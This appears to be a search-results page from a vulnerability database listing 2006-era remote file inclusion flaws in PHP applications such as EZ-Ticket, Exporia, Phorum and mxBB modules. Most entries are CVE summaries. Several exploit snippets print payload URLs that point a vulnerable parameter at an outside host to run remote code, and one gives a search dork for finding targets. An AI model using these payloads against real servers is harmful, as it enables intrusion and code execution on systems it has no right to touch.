192 matches found
ProjectButler <= 0.8.4 (rootdir) Remote File Include Vulnerabilities
No description provided by source. projectbutler-0.8.4 Remote File Inclusion Vulnerability Download: http://prdownloads.sourceforge.net/projectbutler/projectbutler-0.8.4.tar.gz?download Found By: the master exploit: http://Target/Path/classes/Cache.class.php?rootdir=http://cmd.gif?...
Phorum <= 3.2.11 (common.php) Remote File Include Vulnerability
=========================================================== Yee7TeaM WwW.Yee7.CoM =========================================================== Software: Phorum v3.2.11 Vendor: http://www.phorum.org/ Download: http://skrypty.webpc.pl/pobierz274.html Dork: "Copyright C 2000 Phorum Development Team"...
mxBB Module mx_tinies 1.3.0 - Remote File Inclusion
mxBB Module mxtinies 1.3.0 - Remote File Inclusion +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + mxtinies 1.3.0 common.php File Include Vulnerability + + + + Bugfounder: bd0rk || SOH-Crew + + + + Homepage1: www.soh-crew.it.tt + + + + Homepage2: www.school-of-hack.de + + + +...
mxBB Module mx_tinies <= 1.3.0 Remote File Include Vulnerability
Exploit for unknown platform in category web applications ================================================================ mxBB Module mxtinies German Hacker white hat :- 0day.today 2018-04-13...
mxBB Module calsnails 1.06 - 'mx_common.php' File Inclusion
mxBB calsnails module 1.06 Remote File Inclusion Vulnerability Bugfounder: bd0rk || SOH-Crew Website: www.soh-crew.it.tt Gr33tings: nukedx, DeeJay, TheJT, str0ke Mod-Download: http://www.mx-system.com/modules/mxpafiledb/dload.php?action=download&fileid=21 Vulnerable Code: includeonce$modulerootpa...
CVE-2006-5920
CVE-2006-5920 (and related CVE-2006-5113) concerns Yuuki Yoshizawa Exporia 0.3.0. The issue is a PHP remote file inclusion via the lan parameter in common.php (CVE-2006-5920) and a directory traversal variant via the same parameter to includes.php (CVE-2006-5113). The underlying risk described ac...
PT-2006-6587 · Exporia · Exporia
Name of the Vulnerable Software and Affected Versions: Exporia version 0.3.0 Description: A remote file inclusion issue in common.php allows remote attackers to execute arbitrary PHP code via a URL in the lan parameter. However, it's noted that further analysis by SecurityFocus disputes this issu...
CVE-2006-5735
Directory traversal vulnerability in include/common.php in PunBB before 1.2.14 allows remote authenticated users to include and execute arbitrary local files via a .. dot dot in the language parameter, related to register.php storing a language value in the users table...
CVE-2006-5636
CVE-2006-5636 describes a PHP remote file inclusion vulnerability in the file common.php of Simple Website Software (SWS) 0.99 and earlier. The flaw allows remote attackers to execute arbitrary PHP code by supplying a URL in the SWSDIR parameter, enabling remote code execution on affected servers...
Fully Modded phpBB 2 Remote File Include [PHPBB] Exploit (2)
No description provided by source. Fully Modded phpBB 2 Remote File Include PHPBB Exploit 2 Source Code: http://phpbbfm.net/support/indexfm.php http://kent.dl.sourceforge.net/sourceforge/phpbbfm/FM2021-4-40.tar.gz Vulnerable Code: include'includes/common.php'; $phpbbrootpath = $foingrootpath...
CVE-2006-5523
PHP remote file inclusion vulnerability in common.php in EZ-Ticket 0.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the eztrootpath parameter...
CVE-2006-5523
EZ-Ticket 0.0.1 is affected by a PHP remote file inclusion (RFI) vulnerability in common.php, allowing remote attackers to execute arbitrary PHP code via a URL in the ezt_root_path parameter. This CVE-2006-5523 issue yields a high impact (base score 7.5) with network access and no authentication....
CVE-2006-5458
PHP remote file inclusion vulnerability in common.php in Hinton Design phpht Topsites allows remote attackers to execute arbitrary PHP code via a URL in the phphtrealpath parameter...
EZ-Ticket v0.0.1 Remote File Inclusion Vulnerability
EZ-Ticket v0.0.1 Remote File Inclusion Vulnerability Download: http://prdownloads.sourceforge.net/ezt/ezt-0.01.tar.gz?download Found By: the master nidhal exploit: http://Target/Path/common.php?eztrootpath=http://cmd.gif? milw0rm.com 2006-10-22...
Fully Modded phpBB <= 2021.4.40 Multiple File Include Vulnerabilities
Exploit for unknown platform in category web applications ===================================================================== Fully Modded phpBB = 2021.4.40 Multiple File Include Vulnerabilities ===================================================================== Fully Modded phpBB 2 Remote Fi...
EZ-Ticket 0.0.1 (common.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ============================================================== EZ-Ticket 0.0.1 common.php Remote File Include Vulnerability ============================================================== EZ-Ticket v0.0.1 Remote File Inclusion Vulnerability...
CVE-2006-5113
Directory traversal vulnerability in common.php in Yuuki Yoshizawa Exporia 0.3.0 allows remote attackers to include and execute local files via a .. dot dot in the lan parameter to includes.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party...
CVE-2006-5021
Multiple PHP remote file inclusion vulnerabilities in redgun RedBLoG 0.5 allow remote attackers to execute arbitrary PHP code via a URL in 1 the root parameter in imgen.php, and the rootpath parameter in 2 admin/config.php, 3 common.php, and 4 admin/index.php. NOTE: the provenance of this...
PT-2006-5762 · Redgun · Redblog
Name of the Vulnerable Software and Affected Versions: redgun RedBLoG version 0.5 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in several parameters, including the root parameter in "imgen.php", and the root path parameter in "admin/config.php",...
Exporia 0.3 - 'Common.php' Remote File Inclusion
source: https://www.securityfocus.com/bid/20205/info Exporia is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to compromise the application and the underlying system; other...